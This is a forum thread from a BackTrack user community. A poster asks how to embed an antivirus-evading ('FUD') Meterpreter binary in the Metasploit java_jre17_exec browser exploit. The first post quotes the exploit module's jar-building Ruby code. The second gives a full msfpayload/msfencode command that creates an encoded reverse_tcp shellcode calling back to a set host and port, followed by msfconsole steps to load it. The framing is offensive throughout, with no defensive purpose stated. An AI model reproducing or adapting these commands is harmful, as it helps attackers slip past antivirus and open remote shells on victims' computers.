Results 1 to 2 of 2

Thread: java_jre17_exec custom applet

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    2

    Default java_jre17_exec custom applet

    Hello BT!

    I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
    I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.

    Here's the exploit:
    Code:
    /opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
    The interesting lines are:
    Code:
    p = regenerate_payload(cli)
                    jar  = p.encoded_jar
                    paths.each do |path|
                            1.upto(path.length - 1) do |idx|
                                    full = path[0,idx].join("/") + "/"
                                    if !(jar.entries.map{|e|e.name}.include?(full))
                                            jar.add_file(full, '')
                                    end
                            end
                            fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
                            data = fd.read(fd.stat.size)
                            jar.add_file(path.join("/"), data)
                            fd.close
                            #jar.each do |num|  --------- tried to see what does the jar array contain, but it doesen't show up in the console. am i doing it wrong?
                                  #puts num
                            #end
                    end
    
                    print_status("Sending Applet.jar")
                    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
    
                    handler( cli )
            end
    I think "jar.pack" is the final result.

    So I have two options:
    1)Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
    2)Create my own jar and replace it with "jar.pack".

    Do you have some ideas?

    Thanks.

  2. #2
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    2

    Default Re: java_jre17_exec custom applet

    So I've heard about generic/custom and thought it would be a nice ideea to use it with java_jre17_exec:

    I've generated my shellcode:

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.132.128 LPORT=1234 R | msfencode -a x86 -c 1 -e x86/shikata_ga_nai -t c | tr -d '"' | tr -d '\n' > /root/meter.shell
    use exploit/multi/browser/java_jre17_exec
    set PAYLOAD generic/custom
    set PAYLOADFILE /root/meter.shell
    exploit
    [-] Exploit failed: Could not locate a compatible payload for Java/["java"]

    Why?

    Another question:
    I'm using PyWin to create a FUD meterpreter binary.
    1)How could I generate shellcode from my binary so that I could use it with generic/custom along with java_jre17_exec? //later, found a perl script which does it.
    2)Will I get an established connection in the java_jre17_exec exploiting session if I use my custom binary? Or I should open another session using multi/handler?

    Thank you.

Similar Threads

  1. problem with Evil Java Applet
    By deviney in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 07-09-2012, 12:52 PM
  2. Have a problem with Java applet method
    By defiks in forum Beginners Forum
    Replies: 8
    Last Post: 11-13-2010, 08:24 AM
  3. Java Applet with Meterpreter Payload
    By purehate in forum OLD Misc Tools
    Replies: 1
    Last Post: 01-22-2010, 10:27 PM
  4. Malicious Metasploit Applet (via BeEF)
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-01-2009, 01:27 PM
  5. BT4 beta Custom kernel 2.6.28.1-custom
    By danielcosta in forum OLD General IT Discussion
    Replies: 7
    Last Post: 04-15-2009, 12:59 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •